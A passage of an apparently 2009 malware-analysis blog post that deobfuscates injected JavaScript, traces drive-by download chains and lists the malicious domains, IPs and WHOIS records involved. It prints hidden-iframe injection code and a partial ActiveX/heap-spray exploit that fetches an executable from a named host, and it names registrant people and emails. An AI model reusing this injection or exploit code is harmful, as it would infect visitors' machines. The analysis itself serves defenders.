/&gt;r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027&lt;br /&gt;'+r36+'2533632536392536362537'+r36+'3225363125366425363525323025366&lt;br /&gt;5253631253664253635253364253633253332253337'+r36+'2532302537'+r36+'&lt;br /&gt;332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+&lt;br /&gt;'342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'34253&lt;br /&gt;7'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36&lt;br /&gt;+'392532652536332536662536642532662536392536652532652537'+r36+'302&lt;br /&gt;536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'34&lt;br /&gt;2536382532652537'+r36+'322536662537'+r36+'3525366525363425323825346&lt;br /&gt;42536312537'+r36+'342536382532652537'+r36+'322536312536652536342536&lt;br /&gt;6625366425323825323925326125333425333125333125333325333825323925&lt;br /&gt;3262253237'+r36+'253334253338253336253338253636253336253336253237'&lt;br /&gt;+r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364&lt;br /&gt;253333253330253337'+r36+'253230253638253635253639253637'+r36+'25363&lt;br /&gt;82537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+'&lt;br /&gt;342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'36253639253&lt;br /&gt;7'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'3925&lt;br /&gt;3361253638253639253634253634253635253665253237'+r36+'253365253363&lt;br /&gt;2532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29&lt;br /&gt;293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27&lt;br /&gt;'+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';alert(h49d2e3&lt;br /&gt;64714d7(h49d2e36474be1));&amp;lt;/script&amp;gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;The deobfuscated code is&lt;br /&gt;&lt;br /&gt;&lt;table width="477" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"&gt;&lt;tr&gt;&lt;td width="475" height="174" style="padding:10px"&gt;&amp;lt;script&amp;gt;if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%&lt;br /&gt;20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%7&lt;br /&gt;4%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f%&lt;br /&gt;6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f&lt;br /&gt;%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%&lt;br /&gt;2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%2&lt;br /&gt;0%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d&lt;br /&gt;%31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%&lt;br /&gt;6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72&lt;br /&gt;%61%6d%65%3e'));}var myia=true;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;which is an IFRAME&lt;/p&gt;&lt;table width="200" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"&gt;&lt;tr&gt;&lt;td width="459" height="65" style="padding:10px"&gt;&amp;lt;iframe name=c27 src='hxxp://&lt;span class="scam_website"&gt;extraspray.com&lt;/span&gt;/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;u&gt;Analysis on March 25&lt;/u&gt; &lt;br /&gt;&lt;/p&gt;&lt;table width="487" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="281" height="28"&gt;hxxp://&lt;span class="scam_website"&gt;extraspray.com&lt;/span&gt;/in.php?&lt;br /&gt;&lt;/td&gt;&lt;td width="206"&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=687425d9d39cd838a9fcf5f05f37da8f&amp;amp;t=1238026597&amp;amp;type=js" target="_blank"&gt;URL Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="40" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;agkt.info&lt;/span&gt;/evo/getexe.exe&lt;br /&gt;?o=7&amp;amp;t=1238025784&amp;amp;i=2154770527&amp;amp;e=&lt;br /&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="36" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;agkt.info&lt;/span&gt;/evo/exploits/x19.php&lt;br /&gt;?o=7&amp;amp;t=1238025784&amp;amp;i  =2154770527&lt;br /&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="35" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;agkt.info&lt;/span&gt;/evo/exploits/x18.php&lt;br /&gt;?o=7&amp;amp;t=1238025784&amp;amp;i=2154770527&lt;br /&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="31" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;agkt.info&lt;/span&gt;/evo/exploits/x21x1.php&lt;br /&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="35" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;agkt.info&lt;/span&gt;/evo/getexe.exe&lt;br /&gt;?o=4&amp;amp;t=1238025787&amp;amp;i=2154770527&amp;amp;e=&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="31" style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;rifnasax.cn&lt;/span&gt;/nuc/exe.php&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=d52f9efb85ed74924aad6cd64720d575&amp;amp;t=1237274961" target="_blank"&gt;URL Analysis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/82335932d790a3f0073266d648527e75" target="_blank"&gt;VirusTotal&lt;/a&gt; (Kryptik)&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;u&gt;Analysis on April 17 &lt;/u&gt;&lt;/p&gt;&lt;table width="487" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="282" height="24"&gt;hxxp://&lt;span class="scam_website"&gt;extraspray.com&lt;/span&gt;/in.php?&lt;br /&gt;&lt;/td&gt;&lt;td width="205"&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=687425d9d39cd838a9fcf5f05f37da8f&amp;amp;t=1239979475&amp;amp;type=js" target="_blank"&gt;URL Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="47" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;sgqw.info&lt;/span&gt;/evo/getexe.exe&lt;br /&gt;?o=7&amp;amp;t=1239978315&amp;amp;i=2154770527&amp;amp;e=&lt;br /&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="39" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;sgqw.info&lt;/span&gt;/evo/exploits/x19.php&lt;br /&gt;?o=7&amp;amp;t=1239978315&amp;amp;i=2154770&lt;br /&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="38" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;sgqw.info&lt;/span&gt;/evo/exploits/x18.php&lt;br /&gt;?o=7&amp;amp;t=1239978315&amp;amp;i=2154770527&lt;br /&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=65deff066bed6693c366783d403025e6&amp;amp;t=1239979751&amp;amp;type=js" target="_blank"&gt;URL Analysis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/b7cda5ae024b4e54fa1b866a6402d996" target="_blank"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=13c1fb5e0034748c45df92abe9491e274" target="_blank"&gt;Anubis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="37" style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;sgqw.info&lt;/span&gt;/evo/getexe.exe&lt;br /&gt;?o=7&amp;amp;t=1239978315&amp;amp;i=2154770527&amp;amp;e=18&lt;br /&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=65deff066bed6693c366783d403025e6&amp;amp;t=1239979751&amp;amp;type=js" target="_blank"&gt;URL Analysis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/b7cda5ae024b4e54fa1b866a6402d996" target="_blank"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=13c1fb5e0034748c45df92abe9491e274" target="_blank"&gt;Anubis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;Now with &lt;span class="scam_website"&gt;clarafin[.]info&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=3ec2e92d7f43a9af31325c7609a5d43c&amp;amp;t=1239978396&amp;amp;type=js" target="_blank"&gt;Analysis on April 17 (07:26) &lt;/a&gt;&lt;br /&gt;&lt;br /&gt; The source code show:&lt;br /&gt;&lt;/p&gt;&lt;table width="462" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"&gt;&lt;tr&gt;&lt;td width="460" height="174" style="padding:10px"&gt;&amp;lt;script&amp;gt;if (!myia){&lt;br /&gt;document.write(unescape('&lt;br /&gt;%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33%&lt;br /&gt;32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c&lt;br /&gt;%61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61%&lt;br /&gt;66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d&lt;br /&gt;%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%&lt;br /&gt;72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29&lt;br /&gt;%2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20%&lt;br /&gt;77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%7&lt;br /&gt;4%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73&lt;br /&gt;%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%&lt;br /&gt;3e%3c%2f%69%66%72%61%6d%65%3e'));&lt;br /&gt;}&lt;br /&gt;var myia = true;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;  which is the IFRAME for &lt;span class="scam_website"&gt;clarafin[.]info&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="450" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"&gt;&lt;tr&gt;&lt;td width="448" height="90" style="padding:10px"&gt;&amp;lt;iframe name=c32 src='hxxp://&lt;span class="scam_website"&gt;clarafin.info&lt;/span&gt;/traff/index.php?'+Math.round(Math.random()&lt;br /&gt;*253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'&amp;gt;&lt;br /&gt;  &amp;lt;/iframe&amp;gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;You can follow the result for &amp;quot;&lt;span class="scam_website"&gt;clarafin.info&lt;/span&gt;&amp;quot; on this page: &lt;br /&gt;&lt;a href="http://isc.sans.org/diary.html?storyid=6178" target="_blank" style=" color:#000"&gt;Internet Storm Center: Hosted javascript leading to .cn PDF malware&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;-------------&lt;br /&gt;&lt;br /&gt;&lt;p&gt;  And now the new one who just appear on the same page: beebest[.]cn&lt;br /&gt;&lt;br /&gt;&lt;a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=beebest.cn" target="_blank" style="color:#000"&gt;Google Diagnosting for beebest.cn&lt;/a&gt;  AS41665 (HOSTING)&lt;br /&gt;&lt;br /&gt;This is just a part of the code:&lt;br /&gt;&lt;/p&gt;&lt;table width="450" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"&gt;&lt;tr&gt;&lt;td width="448" height="450" style="padding:10px"&gt;&lt;p&gt;  function ss()&lt;br /&gt;{&lt;br /&gt;try{&lt;br /&gt;ret=new ActiveXObject(&amp;quot;snpvw.Snapshot Viewer Control.1&amp;quot;);&lt;br /&gt;var arbitrary&lt;br /&gt;_file = &amp;quot;&lt;b&gt;hxxp://beebest.cn/dlutrl23dnwfas/exe.php&lt;/b&gt;&amp;quot;;&lt;br /&gt;var dest = 'C:/Program Files/Outlook Express/wab&lt;br /&gt;.exe';&lt;br /&gt;document.write(&amp;quot;&amp;lt;object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'&amp;gt;&lt;br /&gt;&amp;lt;/object&amp;gt;&lt;br /&gt;&amp;quot;);&lt;br /&gt;attack.SnapshotPath = arbitrary_file;&lt;br /&gt;setTimeout('window.location = &amp;quot;ldap://127.0.0.1&amp;quot;',3000);&lt;br /&gt;a&lt;br /&gt;ttack.CompressedPath = dest;&lt;br /&gt;attack.PrintSnapshot(arbitrary_file,dest);&lt;br /&gt;}catch(e){}&lt;br /&gt;}&lt;br /&gt;function xml()&lt;br /&gt;{&lt;br /&gt;var spray = unescape(&amp;quot;%u0a0a%u0a0a&amp;quot;);&lt;br /&gt;do { spray += spray; } while(spray.length &amp;lt; 0xd0000);&lt;/p&gt;&lt;p&gt;memory = new Array();&lt;br /&gt;for(i = 0; i &amp;lt; 100; i++){ memory[i] = spray + shellcode; }&lt;br /&gt;document.&lt;br /&gt;getElementById(&amp;quot;xmlplace&amp;quot;).innerHTML = &amp;quot;&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;!&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;table width="437" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="282" height="31"&gt;hxxp://&lt;span class="scam_website"&gt;beebest.cn&lt;/span&gt;/dlutrl23dnwfas/index.php&lt;br /&gt;&lt;/td&gt;&lt;td width="155"&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=8c979b2883f0cf92419a4b342fff4545&amp;amp;t=1239946824" target="_blank"&gt;URL Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="32" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;beebest.cn&lt;/span&gt;/dlutrl23dnwfas/spl/pdf.pdf&lt;br /&gt;&lt;/td&gt;&lt;td  style="border-top:solid 1px #CCC"&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=07dba62f6c9ddb0e4382026de7b1df26&amp;amp;t=1239981396&amp;amp;type=js"&gt;URL Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="39" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;beebest.cn&lt;/span&gt;/dlutrl23dnwfas/exe.php&lt;br /&gt;&lt;/td&gt;&lt;td  style="border-top:solid 1px #CCC"&gt;&lt;a href="http://www.virustotal.com/analisis/e503d8229f7e75c16e93fb24ea0158a9" target="_blank"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1417b1756c1d1e6641d2d1aa0a04cc219&amp;amp;call=first" target="_blank"&gt;Anubis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;A ThreatExpertresult show the connection with stopgam.cn and &lt;br /&gt;stopgam2.cn after infection&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=8f82a4d3271465a32ec888839bdcede0" target="_blank"&gt;ThreatExpert Result&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;br /&gt;It's recommended that you block these IPs using your hosts file or your firewall.&lt;br /&gt; &lt;br /&gt;These domain are also cited on Malware Domain List: &lt;a href="http://www.malwaredomainlist.com/mdl.php?search=91.212.65.7&amp;amp;colsearch=All&amp;amp;quantity=50" target="_blank"&gt;91.212.65.7&lt;/a&gt; &lt;br /&gt;and all are still active.&lt;br /&gt;&lt;br /&gt;&lt;table width="294" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td height="20"&gt;hxxp://&lt;span class="scam_website"&gt;beebest.cn&lt;/span&gt;&lt;/td&gt;&lt;td&gt;78.109.25.215&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="20"  style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;clarafin.info&lt;/span&gt;&lt;/td&gt;&lt;td  style="border-top:solid 1px #CCC"&gt;212.5.74.37&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="22"  style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;corpamata.cn&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;td  style="border-top:solid 1px #CCC"&gt;78.109.25.215&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="164" height="22"  style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;extraspray.com&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;td width="130"  style="border-top:solid 1px #CCC"&gt;72.232.116.51&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="22"  style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;agkt.info&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;td  style="border-top:solid 1px #CCC"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="22"  style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;rifnasax.cn&lt;/span&gt;&lt;/td&gt;&lt;td  style="border-top:solid 1px #CCC"&gt;91.212.65.7&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="22"  style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;sgqw.info&lt;/span&gt;&lt;/td&gt;&lt;td style="border-top:solid 1px #CCC"&gt;85.17.136.137&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="18"  style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;stopgam.cn&lt;/span&gt;&lt;/td&gt;&lt;td  style="border-top:solid 1px #CCC"&gt;85.17.136.137&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="22" style="border-top:solid 1px #CCC"&gt;hxxp://&lt;span class="scam_website"&gt;stopgam2.cn&lt;/span&gt;&lt;/td&gt;&lt;td  style="border-top:solid 1px #CCC"&gt;174.129.244.106&lt;br /&gt;174.129.241.185&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;78.109.25.217&lt;br /&gt;&lt;br /&gt;IP Location   - Namibia - Plathost2 - Ivan Kirst&lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;beebest.cn - stopgam.cn - corpamata.cn&lt;/span&gt;&lt;br /&gt;Domain Status: ok&lt;br /&gt;Registrant Organization: DomainsC&lt;br /&gt;Registrant Name: MichellGregory&lt;br /&gt;Administrative Email: abuse@domainsreg.cn&lt;br /&gt;Sponsoring Registrar: 厦门华融盛世网络有限公司 - &lt;br /&gt;Xiamen Huarong Spirit Network Limited&lt;br /&gt;Name Server: ns1.us.editdns.net&lt;br /&gt;Name Server: ns2.us.editdns.net&lt;br /&gt;Name Server: ns3.us.editdns.net&lt;br /&gt;Registration Date: 2009-02-11&lt;br /&gt;Expiration Date: 2010-02-11&lt;br /&gt;&lt;br /&gt;212.5.74.37&lt;br /&gt;&lt;br /&gt;IP Location   - Russia&lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;clarafin.info&lt;/span&gt;&lt;br /&gt;Domain Status: ok&lt;br /&gt;Billing Organization: XiaMen BizCn Computer &amp;amp; NetWork CO.,Ltd&lt;br /&gt;Name Server: ns1.us.editdns.net&lt;br /&gt;Name Server: ns2.us.editdns.net&lt;br /&gt;Name Server: ns3.us.editdns.net&lt;br /&gt;Registration Date: 2009-03-18&lt;br /&gt;Expiration Date: 2010-03-18&lt;br /&gt;&lt;br /&gt;85.17.136.137&lt;br /&gt;&lt;br /&gt;IP Location   - Netherlands - LeaseWeb&lt;br /&gt;&lt;br /&gt;omain Name: &lt;span class="scam_website"&gt;sgqw.info&lt;/span&gt; &lt;br /&gt;Domain Status: ok&lt;br /&gt;Registrant Organization: Private person  &lt;br /&gt;Registrant Name: Sumir Mahadjan  &lt;br /&gt;Administrative Email: mahadjans9@gmail.com  &lt;br /&gt;Sponsoring Registrar: Regtime Ltd. (R455-LRMS)&lt;br /&gt;Name Server: ns1.mtpv.info&lt;br /&gt;Name Server: ns2.mtpv.info&lt;br /&gt;Name Server:ns3.us.editdns.net&lt;br /&gt;Registration Date: 2009-04-01&lt;br /&gt;Expiration Date: 2010-01-01&lt;br /&gt;&lt;br /&gt;72.232.116.51 &lt;br /&gt;&lt;br /&gt;IP Location   - US - Layered Technologies, Inc.&lt;br /&gt;&lt;br /&gt;omain Name: &lt;span class="scam_website"&gt;extraspray.com&lt;/span&gt;&lt;br /&gt;Domain Status: ok&lt;br /&gt;Registrant Organization: Private person &lt;br /&gt;Registrant Name:  Sumir Mahadjan&lt;br /&gt;Administrative Email: mahadjans9@gmail.com &lt;br /&gt;Sponsoring Registrar: Regtime Ltd.&lt;br /&gt;Name Server: vc11.amhost.net&lt;br /&gt;Name Server: vc12.amhost.net&lt;br /&gt;Registration Date: 2009-03-09&lt;br /&gt;Expiration Date: 2010-03-09 &lt;br /&gt;&lt;br /&gt;174.129.244.106&lt;br /&gt;174.129.241.185 &lt;br /&gt;&lt;br /&gt;IP Location   - US - Amazon.com, Inc.  &lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;stopgam2.cn&lt;/span&gt;&lt;br /&gt;ROID: 20090417s10001s12986159-cn  &lt;br /&gt;Domain Status: clientTransferProhibited  &lt;br /&gt;Registrant Name: Zitoclick  &lt;br /&gt;Administrative Email: support@zitoclick.com  &lt;br /&gt;Sponsoring Registrar: InamePro dba Dynadot  &lt;br /&gt;Name Server: ns1.dsredirection.com  &lt;br /&gt;Name Server: ns2.dsredirection.com  &lt;br /&gt;Registration Date: 2009-04-17 05:23  &lt;br /&gt;Expiration Date: 2010-04-17 05:23 &lt;br /&gt;&lt;br /&gt;91.212.41.119 &lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;tixwagoq.cn&lt;/span&gt;&lt;br /&gt;Registrant Organization: 杭州五矿有限公司  - Minmetals Co., Ltd. Hangzhou&lt;br /&gt;Registrant Name: 周明  - Zhou&lt;br /&gt;Administrative Email: suhalbuia@163.com &lt;br /&gt;Sponsoring Registrar: 易名中国    - Easy Chinese&lt;br /&gt;Name Server: ns1.runsdns.cn &lt;br /&gt;Name Server: ns2.runsdns.cn &lt;br /&gt;Registration Date: 2009-03-18 22:16 &lt;br /&gt;Expiration Date: 2010-03-18 22:16 &lt;br /&gt;&lt;br /&gt;inetnum: 91.212.41.0 - 91.212.41.255&lt;br /&gt;netname: gaztranzitstroyinfo-net&lt;br /&gt;descr: LLC &amp;quot;Gaztransitstroyinfo&amp;quot;&lt;br /&gt;country: Russia&lt;br /&gt; ------------&lt;br /&gt;&lt;br /&gt;91.212.65.7&lt;br /&gt;&lt;br /&gt;IP Location   - Ukraine -  Eurohost LLC  &lt;br /&gt;&lt;br /&gt;Domain Name: &lt;span class="scam_website"&gt;rifnasax.cn&lt;/span&gt;&lt;br /&gt;Registrant Organization: Yong also Import and Export Corporation&lt;br /&gt;Registrant Name: 张龙  - Long&lt;br /&gt;Administrative Email: alvin_555@yeah.net  &lt;br /&gt;Sponsoring Registrar: 易名中国  - Easy Chinese&lt;br /&gt;Name Server: ns2.dnsmytruedns.com  &lt;br /&gt;Name Server: ns1.dnsmytruedns.com  &lt;br /&gt;Registration Date: 2009-02-13 19:29  &lt;br /&gt;Expiration Date: 2010-02-13 19:29 &lt;br /&gt;&lt;br /&gt;This IP appear to host several websites with live exploits.&lt;br /&gt;&lt;br /&gt;91.212.65.7 &lt;br /&gt;&lt;br /&gt;&lt;table width="231" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="231" height="20"&gt;hxxp://&lt;span class="scam_website"&gt;dnsmytruedns.com&lt;/span&gt;&lt;br /&gt;  hxxp://&lt;span class="scam_website"&gt;hayboxiw.cn &lt;/span&gt;(&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=d3305cce9ac1c0b1ccfdea16bbebc49a&amp;amp;t=1239984709&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;hxxp://&lt;span class="scam_website"&gt;paksusic.cn&lt;/span&gt;&lt;br /&gt;hxxp://&lt;span class="scam_website"&gt;paylayos.cn&lt;/span&gt;&lt;br /&gt;hxxp://&lt;span class="scam_website"&gt;peskufex.cn&lt;/span&gt;&lt;br /&gt;hxxp://&lt;span class="scam_website"&gt;porgacig.cn&lt;/span&gt;&lt;br /&gt;hxxp://&lt;span class="scam_website"&gt;qicdator.cn &lt;/span&gt;(&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=baca7b81a5ad8bcc70b210847db959c1&amp;amp;t=1238631850&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;hxxp://&lt;span class="scam_website"&gt;ralcofic.cn&lt;/span&gt;&lt;br /&gt;hxxp://&lt;span class="scam_website"&gt;rifnasax.cn&lt;/span&gt; (&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=d52f9efb85ed74924aad6cd64720d575&amp;amp;t=1237274961&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;hxxp://&lt;span class="scam_website"&gt;tozxiqud.cn&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;91.212.41.119&lt;br /&gt;&lt;br /&gt;&lt;table width="273" border="0" cellspacing="0" cellpadding="0"&gt;  &lt;tr&gt;    &lt;td width="273" height="20"&gt;hxxp://&lt;span class="scam_website"&gt;tixwagoq.cn/in.cgi?6&lt;/span&gt; (&lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=ddc1c497688f76469d1f4ffa4f79902f&amp;amp;t=1239621305&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;)&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-4182474953384058765?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/4182474953384058765'/><link rel='self' type='application/atom+xml' 